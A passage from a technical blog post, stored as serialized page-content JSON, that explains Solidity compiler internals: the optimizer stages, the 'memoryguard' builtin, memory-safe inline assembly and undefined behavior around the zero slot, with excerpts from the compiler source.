generateEVMFromIR",{"type":28,"tag":116,"props":28864,"children":28865},{"style":266},[28866],{"type":33,"value":313},{"type":28,"tag":116,"props":28868,"children":28869},{"style":370},[28870],{"type":33,"value":4240},{"type":28,"tag":116,"props":28872,"children":28873},{"style":266},[28874],{"type":33,"value":28822},{"type":28,"tag":116,"props":28876,"children":28877},{"class":245,"line":614},[28878],{"type":28,"tag":116,"props":28879,"children":28880},{"style":260},[28881],{"type":33,"value":28882},"        else\n",{"type":28,"tag":116,"props":28884,"children":28885},{"class":245,"line":631},[28886,28891,28895,28899],{"type":28,"tag":116,"props":28887,"children":28888},{"style":282},[28889],{"type":33,"value":28890},"            compileContract",{"type":28,"tag":116,"props":28892,"children":28893},{"style":266},[28894],{"type":33,"value":313},{"type":28,"tag":116,"props":28896,"children":28897},{"style":370},[28898],{"type":33,"value":4240},{"type":28,"tag":116,"props":28900,"children":28901},{"style":266},[28902],{"type":33,"value":28903},"contract, otherCompilers);\n",{"type":28,"tag":116,"props":28905,"children":28906},{"class":245,"line":665},[28907],{"type":28,"tag":116,"props":28908,"children":28909},{"style":266},[28910],{"type":33,"value":3025},{"type":28,"tag":29,"props":28912,"children":28913},{},[28914,28916,28923,28924,28931],{"type":33,"value":28915},"Each step applies its own set of optimizations. The entrypoints are located at ",{"type":28,"tag":87,"props":28917,"children":28920},{"href":28918,"rel":28919},"https://github.com/ethereum/solidity/blob/fd9ac9abed2049a4b8134d39e178275c8aad75b6/libyul/YulStack.cpp#L92",[91],[28921],{"type":33,"value":28922},"YulStack::optimize",{"type":33,"value":10659},{"type":28,"tag":87,"props":28925,"children":28928},{"href":28926,"rel":28927},"https://github.com/ethereum/solidity/blob/4a8d6618f5b398077f694835905f93d0a3890289/libevmasm/Assembly.cpp#L336",[91],[28929],{"type":33,"value":28930},"Assembly::optimize",{"type":33,"value":141},{"type":28,"tag":29,"props":28933,"children":28934},{},[28935],{"type":33,"value":28936},"In total, there are four steps.",{"type":28,"tag":455,"props":28938,"children":28939},{},[28940,28944,28949,28953],{"type":28,"tag":459,"props":28941,"children":28942},{},[28943],{"type":33,"value":28757},{"type":28,"tag":459,"props":28945,"children":28946},{},[28947],{"type":33,"value":28948},"Optimization of YUL IR",{"type":28,"tag":459,"props":28950,"children":28951},{},[28952],{"type":33,"value":28762},{"type":28,"tag":459,"props":28954,"children":28955},{},[28956],{"type":33,"value":28957},"Optimization of EVM opcodes",{"type":28,"tag":29,"props":28959,"children":28960},{},[28961],{"type":33,"value":28962},"As mentioned in the v0.8.13 release post, the YUL optimizer is able to perform much more complex optimizations. Compared to Solidity, YUL contains detailed semantic information and is simpler for optimization passes to reason about than opcodes.",{"type":28,"tag":107,"props":28964,"children":28965},{},[28966],{"type":28,"tag":29,"props":28967,"children":28968},{},[28969],{"type":33,"value":28970},"The performance of the new pipeline is not yet always superior to the old one, but it can do much higher-level optimization across functions, so please try it out and give us feedback!",{"type":28,"tag":29,"props":28972,"children":28973},{},[28974],{"type":33,"value":28975},"Importantly, each step happens in isolation and retains no information about the previous stage.",{"type":28,"tag":29,"props":28977,"children":28978},{},[28979],{"type":33,"value":28980},"The optimizer cannot change the behavior of the generated IR. This means we don't need to worry about potentially tricky optimizations such as reordering of functions, removal of unused assigns, or moving stack variables to memory.",{"type":28,"tag":29,"props":28982,"children":28983},{},[28984],{"type":33,"value":28985},"When it comes to safety, we need only to consider the IR generation. But what exactly are the guarantees here?",{"type":28,"tag":63,"props":28987,"children":28989},{"id":28988},"guarantees",[28990],{"type":33,"value":28991},"Guarantees",{"type":28,"tag":29,"props":28993,"children":28994},{},[28995,28996,29003,29005,29010],{"type":33,"value":16275},{"type":28,"tag":87,"props":28997,"children":29000},{"href":28998,"rel":28999},"https://docs.soliditylang.org/en/v0.8.20/internals/layout_in_memory.html",[91],[29001],{"type":33,"value":29002},"Solidity memory layout",{"type":33,"value":29004}," exists only at the time of YUL IR generation. The YUL optimizer and later steps has ",{"type":28,"tag":2583,"props":29006,"children":29007},{},[29008],{"type":33,"value":29009},"no information about this layout",{"type":33,"value":141},{"type":28,"tag":29,"props":29012,"children":29013},{},[29014],{"type":33,"value":29015},"What if the optimizer wants to use memory for optimization passes? How does it know what slots are used by the IR generator?",{"type":28,"tag":29,"props":29017,"children":29018},{},[29019,29021,29027,29029,29035],{"type":33,"value":29020},"Introducing ",{"type":28,"tag":98,"props":29022,"children":29024},{"className":29023},[],[29025],{"type":33,"value":29026},"memoryguard",{"type":33,"value":29028},". If you've ever looked at the output of ",{"type":28,"tag":98,"props":29030,"children":29032},{"className":29031},[],[29033],{"type":33,"value":29034},"solc --ir",{"type":33,"value":29036},", this call may be familiar. It's used to initialize the free-memory pointer.",{"type":28,"tag":234,"props":29038,"children":29040},{"className":4143,"code":29039,"language":4142,"meta":7,"style":7},"    /// @src 0:26:371  \"contract XXX {...\"\n    store(64, memoryguard(0x80))\n",[29041],{"type":28,"tag":98,"props":29042,"children":29043},{"__ignoreMap":7},[29044,29062],{"type":28,"tag":116,"props":29045,"children":29046},{"class":245,"line":246},[29047,29052,29057],{"type":28,"tag":116,"props":29048,"children":29049},{"style":250},[29050],{"type":33,"value":29051},"    /// @src 0:26:371  \"contract ",{"type":28,"tag":116,"props":29053,"children":29054},{"style":376},[29055],{"type":33,"value":29056},"XXX",{"type":28,"tag":116,"props":29058,"children":29059},{"style":250},[29060],{"type":33,"value":29061}," {...\"\n",{"type":28,"tag":116,"props":29063,"children":29064},{"class":245,"line":256},[29065,29070,29074,29079,29083,29087,29091,29096],{"type":28,"tag":116,"props":29066,"children":29067},{"style":282},[29068],{"type":33,"value":29069},"    store",{"type":28,"tag":116,"props":29071,"children":29072},{"style":266},[29073],{"type":33,"value":313},{"type":28,"tag":116,"props":29075,"children":29076},{"style":350},[29077],{"type":33,"value":29078},"64",{"type":28,"tag":116,"props":29080,"children":29081},{"style":266},[29082],{"type":33,"value":825},{"type":28,"tag":116,"props":29084,"children":29085},{"style":282},[29086],{"type":33,"value":29026},{"type":28,"tag":116,"props":29088,"children":29089},{"style":266},[29090],{"type":33,"value":313},{"type":28,"tag":116,"props":29092,"children":29093},{"style":350},[29094],{"type":33,"value":29095},"0x80",{"type":28,"tag":116,"props":29097,"children":29098},{"style":266},[29099],{"type":33,"value":19376},{"type":28,"tag":29,"props":29101,"children":29102},{},[29103,29105,29112],{"type":33,"value":29104},"From ",{"type":28,"tag":87,"props":29106,"children":29109},{"href":29107,"rel":29108},"https://solidity.readthedocs.io/en/latest/yul.html#memoryguard",[91],[29110],{"type":33,"value":29111},"the documentation",{"type":33,"value":3794},{"type":28,"tag":107,"props":29114,"children":29115},{},[29116],{"type":28,"tag":29,"props":29117,"children":29118},{},[29119,29121,29127,29129,29135,29137,29142],{"type":33,"value":29120},"The caller of ",{"type":28,"tag":98,"props":29122,"children":29124},{"className":29123},[],[29125],{"type":33,"value":29126},"let ptr := memoryguard(size)",{"type":33,"value":29128}," (where size has to be a literal number) promises that they only use memory in either the range ",{"type":28,"tag":98,"props":29130,"children":29132},{"className":29131},[],[29133],{"type":33,"value":29134},"[0, size)",{"type":33,"value":29136}," or the unbounded range starting at ",{"type":28,"tag":98,"props":29138,"children":29140},{"className":29139},[],[29141],{"type":33,"value":13615},{"type":33,"value":141},{"type":28,"tag":29,"props":29144,"children":29145},{},[29146,29148,29153,29155,29161],{"type":33,"value":29147},"For example, if the YUL optimizer needs 32 bytes of memory, it can have ",{"type":28,"tag":98,"props":29149,"children":29151},{"className":29150},[],[29152],{"type":33,"value":29026},{"type":33,"value":29154}," return ",{"type":28,"tag":98,"props":29156,"children":29158},{"className":29157},[],[29159],{"type":33,"value":29160},"size + 32",{"type":33,"value":29162},". The optimizer gets a guaranteed region of memory which will not be touched!",{"type":28,"tag":29,"props":29164,"children":29165},{},[29166,29168,29175,29177,29182,29184,29189],{"type":33,"value":29167},"An example of this optimization in practice ",{"type":28,"tag":87,"props":29169,"children":29172},{"href":29170,"rel":29171},"https://github.com/ethereum/solidity/blob/1633e367c90aed7a6a14d84e2c288e6a8ab93304/libyul/optimiser/StackLimitEvader.cpp",[91],[29173],{"type":33,"value":29174},"is the StackLimitEvader",{"type":33,"value":29176},", which moves variables from the stack into memory. Incidentally, this is also currently the ",{"type":28,"tag":2583,"props":29178,"children":29179},{},[29180],{"type":33,"value":29181},"only",{"type":33,"value":29183}," optimization pass that relies on the semantic information communicated by ",{"type":28,"tag":98,"props":29185,"children":29187},{"className":29186},[],[29188],{"type":33,"value":29026},{"type":33,"value":141},{"type":28,"tag":29,"props":29191,"children":29192},{},[29193],{"type":33,"value":29194},"The modular design between different compiler stages also means that we're not tied down into any particular memory layout. Does it make sense to waste an entire memory word on the free memory pointer? Maybe not for some applications.",{"type":28,"tag":29,"props":29196,"children":29197},{},[29198,29200,29206],{"type":33,"value":29199},"Fear not, for we can remove this pointer entirely and call ",{"type":28,"tag":98,"props":29201,"children":29203},{"className":29202},[],[29204],{"type":33,"value":29205},"memoryguard(0x60)",{"type":33,"value":29207}," instead. The rest of the pipeline will still work.",{"type":28,"tag":63,"props":29209,"children":29210},{"id":28719},[29211],{"type":33,"value":29212},"Memory Safety",{"type":28,"tag":29,"props":29214,"children":29215},{},[29216],{"type":33,"value":29217},"So what does memory safety mean?",{"type":28,"tag":29,"props":29219,"children":29220},{},[29221,29223,29229],{"type":33,"value":29222},"The Solidity documentation provides ",{"type":28,"tag":87,"props":29224,"children":29226},{"href":28694,"rel":29225},[91],[29227],{"type":33,"value":29228},"a set of constraints",{"type":33,"value":29230},", not a definition.",{"type":28,"tag":107,"props":29232,"children":29233},{},[29234,29239],{"type":28,"tag":29,"props":29235,"children":29236},{},[29237],{"type":33,"value":29238},"In particular, a memory-safe assembly block may only access the following memory ranges:",{"type":28,"tag":455,"props":29240,"children":29241},{},[29242,29247,29252,29257],{"type":28,"tag":459,"props":29243,"children":29244},{},[29245],{"type":33,"value":29246},"Memory allocated by yourself using a mechanism like the allocate function described above.",{"type":28,"tag":459,"props":29248,"children":29249},{},[29250],{"type":33,"value":29251},"Memory allocated by Solidity, e.g. memory within the bounds of a memory array you reference.",{"type":28,"tag":459,"props":29253,"children":29254},{},[29255],{"type":33,"value":29256},"The scratch space between memory offset 0 and 64 mentioned above.",{"type":28,"tag":459,"props":29258,"children":29259},{},[29260],{"type":33,"value":29261},"Temporary memory that is located after the value of the free memory pointer at the beginning of the assembly\nblock, i.e. memory that is “allocated” at the free memory pointer without updating the free memory pointer.",{"type":28,"tag":29,"props":29263,"children":29264},{},[29265,29267,29274,29284],{"type":33,"value":29266},"Looking to the compiler, it appears the presence of memory-unsafe assembly ",{"type":28,"tag":87,"props":29268,"children":29271},{"href":29269,"rel":29270},"https://github.com/ethereum/solidity/blob/a297a687261a1c634551b1dac0e36d4573c19afe/libsolidity/codegen/ir/IRGenerator.cpp#L210",[91],[29272],{"type":33,"value":29273},"removes the memory guard",{"type":28,"tag":15136,"props":29275,"children":29276},{},[29277],{"type":28,"tag":87,"props":29278,"children":29282},{"href":29279,"ariaDescribedBy":29280,"dataFootnoteRef":7,"id":29281},"#user-content-fn-1",[15143],"user-content-fnref-1",[29283],{"type":33,"value":1824},{"type":33,"value":141},{"type":28,"tag":234,"props":29286,"children":29288},{"className":28765,"code":29287,"language":28767,"meta":7,"style":7},"// bool creationInvolvesMemoryUnsafeAssembly = m_context.memoryUnsafeInlineAssemblySeen();\n// t(\"memoryInitCreation\", memoryInit(!creationInvolvesMemoryUnsafeAssembly));\n\nstring IRGenerator::memoryInit(bool _useMemoryGuard)\n{\n // This function should be called at the beginning of the EVM call frame\n // and thus can assume all memory to be zero, including the contents of\n // the \"zero memory area\" (the position CompilerUtils::zeroPointer points to).\n return\n  Whiskers{\n   _useMemoryGuard ?\n   \"mstore(\u003CmemPtr>, memoryguard(\u003CfreeMemoryStart>))\" :\n   \"mstore(\u003CmemPtr>, \u003CfreeMemoryStart>)\"\n  }\n",[29289],{"type":28,"tag":98,"props":29290,"children":29291},{"__ignoreMap":7},[29292,29300,29308,29315,29351,29358,29366,29374,29382,29390,29398,29411,29424,29432],{"type":28,"tag":116,"props":29293,"children":29294},{"class":245,"line":246},[29295],{"type":28,"tag":116,"props":29296,"children":29297},{"style":250},[29298],{"type":33,"value":29299},"// bool creationInvolvesMemoryUnsafeAssembly = m_context.memoryUnsafeInlineAssemblySeen();\n",{"type":28,"tag":116,"props":29301,"children":29302},{"class":245,"line":256},[29303],{"type":28,"tag":116,"props":29304,"children":29305},{"style":250},[29306],{"type":33,"value":29307},"// t(\"memoryInitCreation\", memoryInit(!creationInvolvesMemoryUnsafeAssembly));\n",{"type":28,"tag":116,"props":29309,"children":29310},{"class":245,"line":293},[29311],{"type":28,"tag":116,"props":29312,"children":29313},{"emptyLinePlaceholder":19},[29314],{"type":33,"value":1044},{"type":28,"tag":116,"props":29316,"children":29317},{"class":245,"line":361},[29318,29323,29328,29333,29337,29342,29347],{"type":28,"tag":116,"props":29319,"children":29320},{"style":339},[29321],{"type":33,"value":29322},"string",{"type":28,"tag":116,"props":29324,"children":29325},{"style":266},[29326],{"type":33,"value":29327}," IRGenerator::",{"type":28,"tag":116,"props":29329,"children":29330},{"style":282},[29331],{"type":33,"value":29332},"memoryInit",{"type":28,"tag":116,"props":29334,"children":29335},{"style":266},[29336],{"type":33,"value":313},{"type":28,"tag":116,"props":29338,"children":29339},{"style":376},[29340],{"type":33,"value":29341},"bool",{"type":28,"tag":116,"props":29343,"children":29344},{"style":272},[29345],{"type":33,"value":29346}," _useMemoryGuard",{"type":28,"tag":116,"props":29348,"children":29349},{"style":266},[29350],{"type":33,"value":2830},{"type":28,"tag":116,"props":29352,"children":29353},{"class":245,"line":387},[29354],{"type":28,"tag":116,"props":29355,"children":29356},{"style":266},[29357],{"type":33,"value":10547},{"type":28,"tag":116,"props":29359,"children":29360},{"class":245,"line":400},[29361],{"type":28,"tag":116,"props":29362,"children":29363},{"style":250},[29364],{"type":33,"value":29365}," // This function should be called at the beginning of the EVM call frame\n",{"type":28,"tag":116,"props":29367,"children":29368},{"class":245,"line":614},[29369],{"type":28,"tag":116,"props":29370,"children":29371},{"style":250},[29372],{"type":33,"value":29373}," // and thus can assume all memory to be zero, including the contents of\n",{"type":28,"tag":116,"props":29375,"children":29376},{"class":245,"line":631},[29377],{"type":28,"tag":116,"props":29378,"children":29379},{"style":250},[29380],{"type":33,"value":29381}," // the \"zero memory area\" (the position CompilerUtils::zeroPointer points to).\n",{"type":28,"tag":116,"props":29383,"children":29384},{"class":245,"line":665},[29385],{"type":28,"tag":116,"props":29386,"children":29387},{"style":260},[29388],{"type":33,"value":29389}," return\n",{"type":28,"tag":116,"props":29391,"children":29392},{"class":245,"line":713},[29393],{"type":28,"tag":116,"props":29394,"children":29395},{"style":266},[29396],{"type":33,"value":29397},"  Whiskers{\n",{"type":28,"tag":116,"props":29399,"children":29400},{"class":245,"line":750},[29401,29406],{"type":28,"tag":116,"props":29402,"children":29403},{"style":266},[29404],{"type":33,"value":29405},"   _useMemoryGuard ",{"type":28,"tag":116,"props":29407,"children":29408},{"style":370},[29409],{"type":33,"value":29410},"?\n",{"type":28,"tag":116,"props":29412,"children":29413},{"class":245,"line":779},[29414,29419],{"type":28,"tag":116,"props":29415,"children":29416},{"style":563},[29417],{"type":33,"value":29418},"   \"mstore(\u003CmemPtr>, memoryguard(\u003CfreeMemoryStart>))\"",{"type":28,"tag":116,"props":29420,"children":29421},{"style":370},[29422],{"type":33,"value":29423}," :\n",{"type":28,"tag":116,"props":29425,"children":29426},{"class":245,"line":796},[29427],{"type":28,"tag":116,"props":29428,"children":29429},{"style":563},[29430],{"type":33,"value":29431},"   \"mstore(\u003CmemPtr>, \u003CfreeMemoryStart>)\"\n",{"type":28,"tag":116,"props":29433,"children":29434},{"class":245,"line":847},[29435],{"type":28,"tag":116,"props":29436,"children":29437},{"style":266},[29438],{"type":33,"value":5543},{"type":28,"tag":29,"props":29440,"children":29441},{},[29442,29447,29449,29455],{"type":28,"tag":98,"props":29443,"children":29445},{"className":29444},[],[29446],{"type":33,"value":29034},{"type":33,"value":29448}," will now no longer have ",{"type":28,"tag":98,"props":29450,"children":29452},{"className":29451},[],[29453],{"type":33,"value":29454},"memoryguard(0x80)",{"type":33,"value":29456}," as expected.",{"type":28,"tag":234,"props":29458,"children":29460},{"className":4143,"code":29459,"language":4142,"meta":7,"style":7},"    /// @src 0:26:371  \"contract XXX {...\"\n    mstore(64, 128)\n",[29461],{"type":28,"tag":98,"props":29462,"children":29463},{"__ignoreMap":7},[29464,29479],{"type":28,"tag":116,"props":29465,"children":29466},{"class":245,"line":246},[29467,29471,29475],{"type":28,"tag":116,"props":29468,"children":29469},{"style":250},[29470],{"type":33,"value":29051},{"type":28,"tag":116,"props":29472,"children":29473},{"style":376},[29474],{"type":33,"value":29056},{"type":28,"tag":116,"props":29476,"children":29477},{"style":250},[29478],{"type":33,"value":29061},{"type":28,"tag":116,"props":29480,"children":29481},{"class":245,"line":256},[29482,29487,29491,29495,29499,29504],{"type":28,"tag":116,"props":29483,"children":29484},{"style":282},[29485],{"type":33,"value":29486},"    mstore",{"type":28,"tag":116,"props":29488,"children":29489},{"style":266},[29490],{"type":33,"value":313},{"type":28,"tag":116,"props":29492,"children":29493},{"style":350},[29494],{"type":33,"value":29078},{"type":28,"tag":116,"props":29496,"children":29497},{"style":266},[29498],{"type":33,"value":825},{"type":28,"tag":116,"props":29500,"children":29501},{"style":350},[29502],{"type":33,"value":29503},"128",{"type":28,"tag":116,"props":29505,"children":29506},{"style":266},[29507],{"type":33,"value":2830},{"type":28,"tag":29,"props":29509,"children":29510},{},[29511,29513,29518,29520,29525],{"type":33,"value":29512},"Semantically, the absence of ",{"type":28,"tag":98,"props":29514,"children":29516},{"className":29515},[],[29517],{"type":33,"value":29026},{"type":33,"value":29519}," means that the IR generator is telling the optimizer that it cannot guarantee the ",{"type":28,"tag":98,"props":29521,"children":29523},{"className":29522},[],[29524],{"type":33,"value":29026},{"type":33,"value":29526}," invariant.",{"type":28,"tag":107,"props":29528,"children":29529},{},[29530],{"type":28,"tag":29,"props":29531,"children":29532},{},[29533,29534,29539,29540,29545,29546,29551],{"type":33,"value":29120},{"type":28,"tag":98,"props":29535,"children":29537},{"className":29536},[],[29538],{"type":33,"value":29126},{"type":33,"value":29128},{"type":28,"tag":98,"props":29541,"children":29543},{"className":29542},[],[29544],{"type":33,"value":29134},{"type":33,"value":29136},{"type":28,"tag":98,"props":29547,"children":29549},{"className":29548},[],[29550],{"type":33,"value":13615},{"type":33,"value":141},{"type":28,"tag":29,"props":29553,"children":29554},{},[29555],{"type":33,"value":29556},"This makes sense. Without stricter guarantees by the programmer, memory-unsafe assembly can touch memory anywhere it wants. Because the optimizer no longer has this guarantee, it cannot use memory in any of its optimization passes.",{"type":28,"tag":63,"props":29558,"children":29560},{"id":29559},"undefined-behavior",[29561],{"type":33,"value":29562},"Undefined Behavior",{"type":28,"tag":29,"props":29564,"children":29565},{},[29566,29568,29573,29575,29580,29582,29588],{"type":33,"value":29567},"How strict is memory safety? When it comes to ",{"type":28,"tag":98,"props":29569,"children":29571},{"className":29570},[],[29572],{"type":33,"value":29026},{"type":33,"value":29574},", only touching memory after 0x80 seems to matter. Is ",{"type":28,"tag":98,"props":29576,"children":29578},{"className":29577},[],[29579],{"type":33,"value":28684},{"type":33,"value":29581}," annotated assembly that touches memory at ",{"type":28,"tag":98,"props":29583,"children":29585},{"className":29584},[],[29586],{"type":33,"value":29587},"[0x40, 0x7f]",{"type":33,"value":29589}," really safe?",{"type":28,"tag":29,"props":29591,"children":29592},{},[29593,29594,29601,29603,29608],{"type":33,"value":16275},{"type":28,"tag":87,"props":29595,"children":29598},{"href":29596,"rel":29597},"https://buildmedia.readthedocs.org/media/pdf/solidity/develop/solidity.pdf",[91],[29599],{"type":33,"value":29600},"Solidity documentation",{"type":33,"value":29602}," mentions ",{"type":28,"tag":2583,"props":29604,"children":29605},{},[29606],{"type":33,"value":29607},"undefined behavior",{"type":33,"value":29609}," three times.",{"type":28,"tag":455,"props":29611,"children":29612},{},[29613,29618,29633],{"type":28,"tag":459,"props":29614,"children":29615},{},[29616],{"type":33,"value":29617},"The existence of a dangling reference",{"type":28,"tag":459,"props":29619,"children":29620},{},[29621,29623],{"type":33,"value":29622},"Using verbatim improperly",{"type":28,"tag":15136,"props":29624,"children":29625},{},[29626],{"type":28,"tag":87,"props":29627,"children":29631},{"href":29628,"ariaDescribedBy":29629,"dataFootnoteRef":7,"id":29630},"#user-content-fn-2",[15143],"user-content-fnref-2",[29632],{"type":33,"value":2794},{"type":28,"tag":459,"props":29634,"children":29635},{},[29636],{"type":33,"value":29637},"Violating the memory model with in-line assembly marked as \"memory-safe\".",{"type":28,"tag":29,"props":29639,"children":29640},{},[29641],{"type":33,"value":29642},"Why does this matter?",{"type":28,"tag":29,"props":29644,"children":29645},{},[29646,29648,29655,29657,29664],{"type":33,"value":29647},"Assumptions about the program code can enable powerful optimizations - that's why ",{"type":28,"tag":87,"props":29649,"children":29652},{"href":29650,"rel":29651},"https://kristerw.blogspot.com/2016/02/how-undefined-signed-overflow-enables.html",[91],[29653],{"type":33,"value":29654},"signed integer overflow is undefined",{"type":33,"value":29656},". Strictly following the compiler model is critical. Undefined behavior materializes as tricky bugs ",{"type":28,"tag":87,"props":29658,"children":29661},{"href":29659,"rel":29660},"https://blog.regehr.org/archives/1307",[91],[29662],{"type":33,"value":29663},"years down the line",{"type":33,"value":141},{"type":28,"tag":29,"props":29666,"children":29667},{},[29668,29670,29677,29678,29683],{"type":33,"value":29669},"Going back to Solidity, the specification makes ",{"type":28,"tag":87,"props":29671,"children":29674},{"href":29672,"rel":29673},"https://docs.soliditylang.org/en/latest/internals/layout_in_memory.html",[91],[29675],{"type":33,"value":29676},"it unambiguously clear",{"type":33,"value":18195},{"type":28,"tag":2583,"props":29679,"children":29680},{},[29681],{"type":33,"value":29682},"Thou shalt not modify the zero slot",{"type":33,"value":141},{"type":28,"tag":107,"props":29685,"children":29686},{},[29687],{"type":28,"tag":29,"props":29688,"children":29689},{},[29690],{"type":33,"value":29691},"The zero slot is used as initial value for dynamic memory arrays and should never be written to (the free memory pointer points to 0x80 initially).",{"type":28,"tag":29,"props":29693,"children":29694},{},[29695,29697,29702],{"type":33,"value":29696},"Any code that touches the zero slot at 0x60 is very clearly violating the specification. Does this matter though? This is where the semantics between Solidity and YUL gets tricky. Recall that the zero slot is a construction ",{"type":28,"tag":2583,"props":29698,"children":29699},{},[29700],{"type":33,"value":29701},"in Solidity",{"type":33,"value":141},{"type":28,"tag":29,"props":29704,"children":29705},{},[29706],{"type":33,"value":29707},"Even though there's no explicit guarantee that inline assembly will be emitted verbatim during generation",{"type":28,"tag":455,"props":29709,"children":29710},{},[29711],{"type":28,"tag":459,"props":29712,"children":29713},{},[29714,29716,29723],{"type":33,"value":29715},"It very clearly ",{"type":28,"tag":87,"props":29717,"children":29720},{"href":29718,"rel":29719},"https://github.com/ethereum/solidity/blob/a297a687261a1c634551b1dac0e36d4573c19afe/libsolidity/codegen/ir/IRGeneratorForStatements.cpp#L2216",[91],[29721],{"type":33,"value":29722},"holds true today",{"type":33,"value":141},{"type":28,"tag":234,"props":29725,"children":29727},{"className":28765,"code":29726,"language":28767,"meta":7,"style":7},"bool IRGeneratorForStatements::visit(InlineAssembly const& _inlineAsm)\n{\n    setLocation(_inlineAsm);\n    if (*_inlineAsm.annotation().hasMemoryEffects && !_inlineAsm.annotation().markedMemorySafe)\n        m_context.setMemoryUnsafeInlineAssemblySeen();\n    CopyTranslate bodyCopier{_inlineAsm.dialect(), m_context, _inlineAsm.annotation().externalReferences};\n\n    yul::Statement modified = bodyCopier(_inlineAsm.operations());`\n",[29728],{"type":28,"tag":98,"props":29729,"children":29730},{"__ignoreMap":7},[29731,29771,29778,29791,29862,29883,29934,29941],{"type":28,"tag":116,"props":29732,"children":29733},{"class":245,"line":246},[29734,29738,29743,29748,29752,29757,29762,29767],{"type":28,"tag":116,"props":29735,"children":29736},{"style":376},[29737],{"type":33,"value":29341},{"type":28,"tag":116,"props":29739,"children":29740},{"style":266},[29741],{"type":33,"value":29742}," IRGeneratorForStatements::",{"type":28,"tag":116,"props":29744,"children":29745},{"style":282},[29746],{"type":33,"value":29747},"visit",{"type":28,"tag":116,"props":29749,"children":29750},{"style":266},[29751],{"type":33,"value":313},{"type":28,"tag":116,"props":29753,"children":29754},{"style":339},[29755],{"type":33,"value":29756},"InlineAssembly",{"type":28,"tag":116,"props":29758,"children":29759},{"style":376},[29760],{"type":33,"value":29761}," const&",{"type":28,"tag":116,"props":29763,"children":29764},{"style":272},[29765],{"type":33,"value":29766}," _inlineAsm",{"type":28,"tag":116,"props":29768,"children":29769},{"style":266},[29770],{"type":33,"value":2830},{"type":28,"tag":116,"props":29772,"children":29773},{"class":245,"line":256},[29774],{"type":28,"tag":116,"props":29775,"children":29776},{"style":266},[29777],{"type":33,"value":10547},{"type":28,"tag":116,"props":29779,"children":29780},{"class":245,"line":293},[29781,29786],{"type":28,"tag":116,"props":29782,"children":29783},{"style":282},[29784],{"type":33,"value":29785},"    setLocation",{"type":28,"tag":116,"props":29787,"children":29788},{"style":266},[29789],{"type":33,"value":29790},"(_inlineAsm);\n",{"type":28,"tag":116,"props":29792,"children":29793},{"class":245,"line":361},[29794,29798,29802,29806,29811,29815,29820,29824,29829,29833,29837,29841,29845,29849,29853,29858],{"type":28,"tag":116,"props":29795,"children":29796},{"style":260},[29797],{"type":33,"value":11947},{"type":28,"tag":116,"props":29799,"children":29800},{"style":266},[29801],{"type":33,"value":269},{"type":28,"tag":116,"props":29803,"children":29804},{"style":370},[29805],{"type":33,"value":4240},{"type":28,"tag":116,"props":29807,"children":29808},{"style":272},[29809],{"type":33,"value":29810},"_inlineAsm",{"type":28,"tag":116,"props":29812,"children":29813},{"style":266},[29814],{"type":33,"value":141},{"type":28,"tag":116,"props":29816,"children":29817},{"style":282},[29818],{"type":33,"value":29819},"annotation",{"type":28,"tag":116,"props":29821,"children":29822},{"style":266},[29823],{"type":33,"value":1540},{"type":28,"tag":116,"props":29825,"children":29826},{"style":272},[29827],{"type":33,"value":29828},"hasMemoryEffects",{"type":28,"tag":116,"props":29830,"children":29831},{"style":370},[29832],{"type":33,"value":13851},{"type":28,"tag":116,"props":29834,"children":29835},{"style":370},[29836],{"type":33,"value":12530},{"type":28,"tag":116,"props":29838,"children":29839},{"style":272},[29840],{"type":33,"value":29810},{"type":28,"tag":116,"props":29842,"children":29843},{"style":266},[29844],{"type":33,"value":141},{"type":28,"tag":116,"props":29846,"children":29847},{"style":282},[29848],{"type":33,"value":29819},{"type":28,"tag":116,"props":29850,"children":29851},{"style":266},[29852],{"type":33,"value":1540},{"type":28,"tag":116,"props":29854,"children":29855},{"style":272},[29856],{"type":33,"value":29857},"markedMemorySafe",{"type":28,"tag":116,"props":29859,"children":29860},{"style":266},[29861],{"type":33,"value":2830},{"type":28,"tag":116,"props":29863,"children":29864},{"class":245,"line":387},[29865,29870,29874,29879],{"type":28,"tag":116,"props":29866,"children":29867},{"style":272},[29868],{"type":33,"value":29869},"        m_context",{"type":28,"tag":116,"props":29871,"children":29872},{"style":266},[29873],{"type":33,"value":141},{"type":28,"tag":116,"props":29875,"children":29876},{"style":282},[29877],{"type":33,"value":29878},"setMemoryUnsafeInlineAssemblySeen",{"type":28,"tag":116,"props":29880,"children":29881},{"style":266},[29882],{"type":33,"value":1445},{"type":28,"tag":116,"props":29884,"children":29885},{"class":245,"line":400},[29886,29891,29895,29899,29904,29909,29913,29917,29921,29925,29930],{"type":28,"tag":116,"props":29887,"children":29888},{"style":266},[29889],{"type":33,"value":29890},"    CopyTranslate bodyCopier{",{"type":28,"tag":116,"props":29892,"children":29893},{"style":272},[29894],{"type":33,"value":29810},{"type":28,"tag":116,"props":29896,"children":29897},{"style":266},[29898],{"type":33,"value":141},{"type":28,"tag":116,"props":29900,"children":29901},{"style":282},[29902],{"type":33,"value":29903},"dialect",{"type":28,"tag":116,"props":29905,"children":29906},{"style":266},[29907],{"type":33,"value":29908},"(), m_context, ",{"type":28,"tag":116,"props":29910,"children":29911},{"style":272},[29912],{"type":33,"value":29810},{"type":28,"tag":116,"props":29914,"children":29915},{"style":266},[29916],{"type":33,"value":141},{"type":28,"tag":116,"props":29918,"children":29919},{"style":282},[29920],{"type":33,"value":29819},{"type":28,"tag":116,"props":29922,"children":29923},{"style":266},[29924],{"type":33,"value":1540},{"type":28,"tag":116,"props":29926,"children":29927},{"style":272},[29928],{"type":33,"value":29929},"externalReferences",{"type":28,"tag":116,"props":29931,"children":29932},{"style":266},[29933],{"type":33,"value":16239},{"type":28,"tag":116,"props":29935,"children":29936},{"class":245,"line":614},[29937],{"type":28,"tag":116,"props":29938,"children":29939},{"emptyLinePlaceholder":19},[29940],{"type":33,"value":1044},{"type":28,"tag":116,"props":29942,"children":29943},{"class":245,"line":631},[29944,29949,29953,29958,29962,29966,29970,29975],{"type":28,"tag":116,"props":29945,"children":29946},{"style":266},[29947],{"type":33,"value":29948},"    yul::Statement modified ",{"type":28,"tag":116,"props":29950,"children":29951},{"style":370},[29952],{"type":33,"value":373},{"type":28,"tag":116,"props":29954,"children":29955},{"style":282},[29956],{"type":33,"value":29957}," 